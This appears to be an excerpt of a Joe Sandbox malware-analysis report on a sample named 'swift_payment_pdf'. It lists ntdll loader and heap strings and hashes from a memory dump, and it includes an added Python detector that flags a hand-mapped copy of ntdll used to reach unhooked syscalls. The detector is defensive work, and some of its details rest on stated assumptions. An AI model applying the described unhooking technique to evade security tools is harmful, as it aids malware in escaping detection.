                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                  • API String ID: 0-4009184096
                  • Opcode ID: 38e3cc52612eb4ab68daf509759eac5c686293cf32eab3d21f92d199387494e1
                  • Instruction ID: 5505e4b41e1a6d3ecdcbc685ade527b20d0543048b31dd270731a8254a0188c3
                  • Opcode Fuzzy Hash: 38e3cc52612eb4ab68daf509759eac5c686293cf32eab3d21f92d199387494e1
                  • Instruction Fuzzy Hash: FE0250F5D002299FDF21DB58CC80BEAB7B8AF54718F0441DAE649A7241DB70AE84CF59
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                  • API String ID: 0-2515994595
                  • Opcode ID: 3bff28b8c2824d8bbd8ae8f90057966d3241bba182d376649013bd0c5ef34249
                  • Instruction ID: 3c10f28f7ed8a5b643bb6a77e9d75035299f32a7f7c63a8071f83fcf41a79f72
                  • Opcode Fuzzy Hash: 3bff28b8c2824d8bbd8ae8f90057966d3241bba182d376649013bd0c5ef34249
                  • Instruction Fuzzy Hash: 5351DE716053169BD729DF198844BABBBECFF94748F14496DFA98C3280E770D608CB92
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                  • API String ID: 0-1700792311
                  • Opcode ID: 5091eb0ec06ad2ecacb429eeb0ed7413793b2371357c70d535db404a9a4c1bc9
                  • Instruction ID: 2067a15501694986da4ef37cb5b0e59d64f8d32cd01d551e1cf33ae9acd17474
                  • Opcode Fuzzy Hash: 5091eb0ec06ad2ecacb429eeb0ed7413793b2371357c70d535db404a9a4c1bc9
                  • Instruction Fuzzy Hash: 88D1C135500685EFDB22DFAAC440BAABBF1FF5A754F08806AF4459B3A2C735E941CB14
                  Strings
                  • HandleTraces, xrefs: 013D8C8F
                  • VerifierDebug, xrefs: 013D8CA5
                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 013D8A67
                  • VerifierDlls, xrefs: 013D8CBD
                  • VerifierFlags, xrefs: 013D8C50
                  • AVRF: -*- final list of providers -*- , xrefs: 013D8B8F
                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 013D8A3D
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                  • API String ID: 0-3223716464
                  • Opcode ID: 3660ba18a96f764ff7aa062137b974dd9d81a7f6db4bcd7c0899a02e04c29259
                  • Instruction ID: 80968dfd0f8d8dc1c4d7e0f2bd5d278536ac784ee4d87bf0d59e1dce759e4303
                  • Opcode Fuzzy Hash: 3660ba18a96f764ff7aa062137b974dd9d81a7f6db4bcd7c0899a02e04c29259
                  • Instruction Fuzzy Hash: E89125B3641716EFEB21EF6CE880B5AB7A8BB5561CF050499FA416F290C730BC01CB95
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                  • API String ID: 0-1109411897
                  • Opcode ID: 3cd6b1c57364d04dcd66e1b39506a450edcf2cc6c3ff91162c3eb75ab0215627
                  • Instruction ID: 6c36fa4d0a6db098ee3934c3d307f4e4a19d7d35a84a7bbff9a3c1626d3a57fd
                  • Opcode Fuzzy Hash: 3cd6b1c57364d04dcd66e1b39506a450edcf2cc6c3ff91162c3eb75ab0215627
                  • Instruction Fuzzy Hash: ABA26E74A056298FDF64CF18CC88BADBBB5AF45708F1442E9D90EA7651EB349E84CF04
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                  • API String ID: 0-792281065
                  • Opcode ID: c7d48e67806fb394b69f6dd5fa9df7cb889ceed6a6cc9da5896fce5b37f3c3fd
                  • Instruction ID: cd89486a2d6481b4a6661878d16fb15e085e18b44ba02104b0759f0e7fc706a4
                  • Opcode Fuzzy Hash: c7d48e67806fb394b69f6dd5fa9df7cb889ceed6a6cc9da5896fce5b37f3c3fd
                  • Instruction Fuzzy Hash: 959102B5B003199BEB25EF5CE856BAE7BA6BF41F2CF10412DE9407B691DB709801C790
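The records in this section all come from one dump, 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, whose name encodes the region's attributes, and the strings they carry (minkernel\ntdll\ldrinit.c, _LdrpInitialize, LdrpInitializeProcess, LdrInitializeThunk) exist only inside ntdll.dll. Put together, a PE-based region of private, execute-read-write memory at 0x01320000 full of ntdll loader strings is what a hand-mapped second copy of ntdll looks like, the usual way to reach unhooked syscall stubs. The following Python is an added example, not code from this report or from Joe Sandbox, that decodes such a dump name and checks those indicators. Two things are assumptions: the field order in the .sdmp name (process index, dump round, timestamp, base, protection, state, type, trailing field) is inferred from the name on this page and the winnt.h constant values that fall out of it (0x40 = PAGE_EXECUTE_READWRITE, 0x1000 = MEM_COMMIT, 0x20000 = MEM_PRIVATE), and the base of the loader-mapped ntdll (0x77000000) is a placeholder because the report does not state it. The sample strings are copied from the record above.

```python
"""Decode a Joe Sandbox .sdmp name and flag a manually mapped copy of ntdll."""
import re
from dataclasses import dataclass

# winnt.h constants used to decode the region attributes in the dump name.
PAGE_EXECUTE_READWRITE = 0x40
MEM_COMMIT = 0x1000
MEM_PRIVATE = 0x20000
MEM_IMAGE = 0x1000000

PROTECT_NAMES = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
TYPE_NAMES = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Loader source paths and routine names that ship only inside ntdll.dll. Seeing
# them in a region that is not the loaded ntdll image means a second copy was
# mapped by hand (the usual way to obtain unhooked syscall stubs).
NTDLL_MARKERS = (
    "minkernel\\ntdll\\ldrinit.c",
    "minkernel\\ntdll\\ldrredirect.c",
    "_LdrpInitialize",
    "LdrpInitializeProcess",
    "LdrInitializeThunk",
)

# ASSUMED field order, inferred from the name on this page:
# process . round . timestamp . base . protect . state . type . extra
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9a-f]{8})\.(?P<round>[0-9a-f]{8})\.(?P<ts>\d+)\."
    r"(?P<base>[0-9a-f]{16})\.(?P<protect>[0-9a-f]{8})\.(?P<state>[0-9a-f]{8})\."
    r"(?P<type>[0-9a-f]{8})\.(?P<extra>[0-9a-f]{8})\.sdmp$", re.IGNORECASE)


@dataclass(frozen=True)
class Region:
    proc: int
    base: int
    protect: int
    state: int
    type: int


def parse_sdmp_name(name):
    """Decode the region attributes encoded in a Joe Sandbox dump file name."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a recognised .sdmp name: {name}")
    return Region(proc=int(m["proc"], 16), base=int(m["base"], 16),
                  protect=int(m["protect"], 16), state=int(m["state"], 16),
                  type=int(m["type"], 16))


def describe_protect(protect):
    """Name the base protection; modifier bits (guard, nocache, ...) are appended."""
    name = PROTECT_NAMES.get(protect & 0xFF, f"0x{protect & 0xFF:02x}")
    mods = [n for bit, n in ((0x100, "PAGE_GUARD"), (0x200, "PAGE_NOCACHE"),
                             (0x400, "PAGE_WRITECOMBINE")) if protect & bit]
    return "|".join([name] + mods)


def remapped_ntdll_indicators(region, strings, loaded_ntdll_base, is_pe):
    """Reasons this region looks like a hand-mapped ntdll copy; empty list means clean."""
    reasons = []
    hits = sorted({m for m in NTDLL_MARKERS for s in strings if m in s})
    if not hits or region.base == loaded_ntdll_base:
        return reasons  # no ntdll-only strings, or this is the real loaded ntdll
    reasons.append(f"ntdll-only strings outside loaded ntdll "
                   f"(0x{loaded_ntdll_base:x}): {', '.join(hits)}")
    if is_pe:
        reasons.append(f"region at 0x{region.base:x} carries a PE header")
    if region.type & MEM_PRIVATE:
        reasons.append("backed by private memory (MEM_PRIVATE), not a file-backed MEM_IMAGE")
    if (region.protect & 0xFF) == PAGE_EXECUTE_READWRITE:
        reasons.append("whole region is PAGE_EXECUTE_READWRITE")
    return reasons


# Constructed input: the dump name and the strings listed in the record above.
# The loaded-ntdll base is an ASSUMED placeholder; the report does not give it.
SAMPLE_DUMP = "00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp"
SAMPLE_STRINGS = [
    "Delaying execution failed with status 0x%08lx",
    "LDR:MRDATA: Process initialization failed with status 0x%08lx",
    "_LdrpInitialize",
    "minkernel\\ntdll\\ldrinit.c",
]
ASSUMED_LOADED_NTDLL_BASE = 0x77000000


def analyse_sample():
    """Run the check on the constructed sample; returns (region, reasons)."""
    region = parse_sdmp_name(SAMPLE_DUMP)
    reasons = remapped_ntdll_indicators(region, SAMPLE_STRINGS,
                                        ASSUMED_LOADED_NTDLL_BASE, is_pe=True)
    return region, reasons


if __name__ == "__main__":
    region, reasons = analyse_sample()
    print(f"process {region.proc} base 0x{region.base:x} "
          f"{describe_protect(region.protect)} {TYPE_NAMES.get(region.type, hex(region.type))}")
    for r in reasons:
        print(" -", r)
```

On a live host the same check is done with VirtualQueryEx over every region of the process, comparing each region's base with the ntdll entry in the PEB loader list; the dump-name decoding above only substitutes for that query when working from a sandbox report. A hit on ntdll-only strings in a region whose base is the real loaded ntdll is deliberately not reported, so the check stays quiet on a clean process.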
                  Strings
                  • LdrpInitShimEngine, xrefs: 013A99F4, 013A9A07, 013A9A30
                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 013A99ED
                  • minkernel\ntdll\ldrinit.c, xrefs: 013A9A11, 013A9A3A
                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 013A9A01
                  • apphelp.dll, xrefs: 01346496
                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 013A9A2A
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                  • API String ID: 0-204845295
                  • Opcode ID: 2c963ae6b7d432759fa122f9607c4fe6476fcacf05ccdf5e847145162cc97f52
                  • Instruction ID: 1394810b7717e3b9d5204b86707a48afb4a79cff53141ca28abb74760bc211ad
                  • Opcode Fuzzy Hash: 2c963ae6b7d432759fa122f9607c4fe6476fcacf05ccdf5e847145162cc97f52
                  • Instruction Fuzzy Hash: 54519275208305DFE725DF28D851B6B7BE8FF85A4CF40491EF595AB260DA30E904CB92
                  Strings
                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 013C21BF
                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 013C2180
                  • RtlGetAssemblyStorageRoot, xrefs: 013C2160, 013C219A, 013C21BA
                  • SXS: %s() passed the empty activation context, xrefs: 013C2165
                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 013C219F
                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 013C2178
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                  • API String ID: 0-861424205
                  • Opcode ID: 015ab748e143ec37dd5c7bae2df9d1a50e604808a79d531dbed2a75c2564579a
                  • Instruction ID: 99aeda9a1f48cdb363cfab771eaa7ffd500a179fa1bc5ec67eda0aaed47a8908
                  • Opcode Fuzzy Hash: 015ab748e143ec37dd5c7bae2df9d1a50e604808a79d531dbed2a75c2564579a
                  • Instruction Fuzzy Hash: 673135BAB403157BF721AB9A8C85F5B7B78DBE5E5CF05005DFA05AB201D2709E01C3A0
                  Strings
                  • minkernel\ntdll\ldrredirect.c, xrefs: 013C8181, 013C81F5
                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 013C81E5
                  • Loading import redirection DLL: '%wZ', xrefs: 013C8170
                  • minkernel\ntdll\ldrinit.c, xrefs: 0138C6C3
                  • LdrpInitializeImportRedirection, xrefs: 013C8177, 013C81EB
                  • LdrpInitializeProcess, xrefs: 0138C6C4
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                  • API String ID: 0-475462383
                  • Opcode ID: 815641c59280b9fc72e4d8c0ae8e31090f484906ac427ee76b97043254391407
                  • Instruction ID: 5fa320fcd91762404b7e0ebc6af3ed360137fa0a194757d5389c1a12e60a7c30
                  • Opcode Fuzzy Hash: 815641c59280b9fc72e4d8c0ae8e31090f484906ac427ee76b97043254391407
                  • Instruction Fuzzy Hash: 6D3102726443469FD220EF2DD946E1A7BE4EF94F2CF04456CF9806B391E620ED04C7A2
                  APIs
                    • Part of subcall function 01392DF0: LdrInitializeThunk.NTDLL ref: 01392DFA
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01390BA3
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01390BB6
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01390D60
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01390D74
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                  • String ID:
                  • API String ID: 1404860816-0
                  • Opcode ID: 99ef0191f0555aa21ced98d9193978f10dee65e5b6eef578b011fe6c40e8c2a4
                  • Instruction ID: 24879c7d13ae18b3f7dc5b19969d45d64e548a36e2b2c6918f0dae5dc27e6e69
                  • Opcode Fuzzy Hash: 99ef0191f0555aa21ced98d9193978f10dee65e5b6eef578b011fe6c40e8c2a4
                  • Instruction Fuzzy Hash: 17425B75900715DFDF25CF28C880BAAB7F9BF04318F1445A9E999EB241E770AA84CF61
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                  • API String ID: 0-379654539
                  • Opcode ID: c87b9f6f8d82b9c8c4c999042f70d6c9c4520cacc1bf0133df415cd4f17a5610
                  • Instruction ID: 00f86c61a354c81ba5861caea33194da93359da4034763db44385f176e579eee
                  • Opcode Fuzzy Hash: c87b9f6f8d82b9c8c4c999042f70d6c9c4520cacc1bf0133df415cd4f17a5610
                  • Instruction Fuzzy Hash: BEC18AB4108386CFD751CF58C040BAABBE8BF88B0CF044A6AF9959B750E734D949DB56
                  Strings
                  • @, xrefs: 01388591
                  • minkernel\ntdll\ldrinit.c, xrefs: 01388421
                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0138855E
                  • LdrpInitializeProcess, xrefs: 01388422
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                  • API String ID: 0-1918872054
                  • Opcode ID: e21e635d90e314865fdb254580b7d918a3eef50b2e34c1b546b1ffb8740ab609
                  • Instruction ID: 14c70c00ace2cf385e95be5dcc18c6fad3235a4cb791e46fa6b4fd44021851bc
                  • Opcode Fuzzy Hash: e21e635d90e314865fdb254580b7d918a3eef50b2e34c1b546b1ffb8740ab609
                  • Instruction Fuzzy Hash: CC918F71608345AFDB21EF69CC40EABBAECBF8475CF80496DF68496151E330D904CB62
                  Strings
                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 013C22B6
                  • .Local, xrefs: 013828D8
                  • SXS: %s() passed the empty activation context, xrefs: 013C21DE
                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 013C21D9, 013C22B1
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                  • API String ID: 0-1239276146
                  • Opcode ID: 86dd939acd15d939da005f8d77c8a059f3bf9f40c724262b8a7b055d6215b61b
                  • Instruction ID: 1a1ee300c9b291b85b4cd212b59fcdeb1ce698e78b742d9d8edb1f76480f3968
                  • Opcode Fuzzy Hash: 86dd939acd15d939da005f8d77c8a059f3bf9f40c724262b8a7b055d6215b61b
                  • Instruction Fuzzy Hash: 81A1BF35900329DBDF24EF69CC84BAAB7B5BF58758F1441EAE908A7251D7309E80CF90
                  Strings
                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 013B0FE5
                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 013B10AE
                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 013B106B
                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 013B1028
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                  • API String ID: 0-1468400865
                  • Opcode ID: 74599f59450e04012499f886d140c220481f56dfe8dc2fac2367c41dff17f39a
                  • Instruction ID: 15be40f7f44b8c8008e45e3d4fdd355fdf7c5f14436138363ff4f353fe48b61b
                  • Opcode Fuzzy Hash: 74599f59450e04012499f886d140c220481f56dfe8dc2fac2367c41dff17f39a
                  • Instruction Fuzzy Hash: 2171DDB1944345AFCB61DF18C885F9B7BA8AF54B6CF800968FD498B246D734D188CBD2
                  Strings
                  • LdrpDynamicShimModule, xrefs: 013BA998
                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 013BA992
                  • minkernel\ntdll\ldrinit.c, xrefs: 013BA9A2
                  • apphelp.dll, xrefs: 01372462
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                  • API String ID: 0-176724104
                  • Opcode ID: 0e027b264cc1fd34377cf22e4c75a9e9f015ed4efe31e625135cd97b8d0fe146
                  • Instruction ID: 65da4b6960076a41a26e8c8b7aa93832230433ea551762129cfe0f600053987f
                  • Opcode Fuzzy Hash: 0e027b264cc1fd34377cf22e4c75a9e9f015ed4efe31e625135cd97b8d0fe146
                  • Instruction Fuzzy Hash: D9315779A00205EBEB31DF5DD881EAABBB8FB84B0CF16405DFA0167665E7709881D790
                  Strings
                  • HEAP: , xrefs: 01363264
                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0136327D
                  • HEAP[%wZ]: , xrefs: 01363255
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                  • API String ID: 0-617086771
                  • Opcode ID: c6217daca6487d1435fa16e967efa13b63df7b291428cc0b4f67a86bc23697d9
                  • Instruction ID: 405fa722491db2c145987398547961949100d0488acd65d51f58ab2943a05e9d
                  • Opcode Fuzzy Hash: c6217daca6487d1435fa16e967efa13b63df7b291428cc0b4f67a86bc23697d9
                  • Instruction Fuzzy Hash: 2492BB70A04249DFDB25CF68C4447AEBBF9FF08308F19C069E859AB799D734A945CB50
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                  • API String ID: 0-4253913091
                  • Opcode ID: e3302f9d3582ae0b4cee7e734fd7c493e38d2df85ccf2e86925641897384f6f2
                  • Instruction ID: a33b7a1283463454c6cfa831e5552c58ea6a32ee9c0b887b362d3d1a8c083152
                  • Opcode Fuzzy Hash: e3302f9d3582ae0b4cee7e734fd7c493e38d2df85ccf2e86925641897384f6f2
                  • Instruction Fuzzy Hash: 01F1BF30600606DFEB29CF68C885BAABBF9FF44308F148169E5169B795D734E981CF90
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: $@
                  • API String ID: 0-1077428164
                  • Opcode ID: 087ce6f0ab08f35def266e31662e9f7d6a6456978b8b009bb58bcd8dde1f7551
                  • Instruction ID: 6651a0064d403e2943dc602d3db37b76d4c97da115d82f89e30bbc10959aa3e5
                  • Opcode Fuzzy Hash: 087ce6f0ab08f35def266e31662e9f7d6a6456978b8b009bb58bcd8dde1f7551
                  • Instruction Fuzzy Hash: 63C283716087459FEB35CF28C485BABBBE5AF88758F04892DF989C7241E738D805CB52
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: FilterFullPath$UseFilter$\??\
                  • API String ID: 0-2779062949
                  • Opcode ID: d92488e2ed053c9d74b91fb43b481ee5db681adadf31b4ed57f7a52e5e6e24ff
                  • Instruction ID: 46c99536d704ca79dd5b925b3f62f343d4d36392d28bd960112b674200374c3b
                  • Opcode Fuzzy Hash: d92488e2ed053c9d74b91fb43b481ee5db681adadf31b4ed57f7a52e5e6e24ff
                  • Instruction Fuzzy Hash: 61A17D769016299BDF31DF28CC88BEAB7B8EF44718F1041E9E909A7250D735AE84CF50
                  Strings
                  • Failed to allocated memory for shimmed module list, xrefs: 013BA10F
                  • LdrpCheckModule, xrefs: 013BA117
                  • minkernel\ntdll\ldrinit.c, xrefs: 013BA121
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                  • API String ID: 0-161242083
                  • Opcode ID: 255e5ca3e823349b3b2667eee4bbb5f90534bfae49aed3dc0a67abc0571bfe68
                  • Instruction ID: f327c6be9ac29c1b94ac4b548b4badfa25830051f63d201f0a9885887d96c198
                  • Opcode Fuzzy Hash: 255e5ca3e823349b3b2667eee4bbb5f90534bfae49aed3dc0a67abc0571bfe68
                  • Instruction Fuzzy Hash: EF71D174A0020ADFDF29DFACC981ABEB7F4FB45608F15402DE906EB615E734A941CB50
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                  • API String ID: 0-1334570610
                  • Opcode ID: bb713bfa9844102b49779dac35348f74bbbb3cbbbbd0f81d7302d242244bc86e
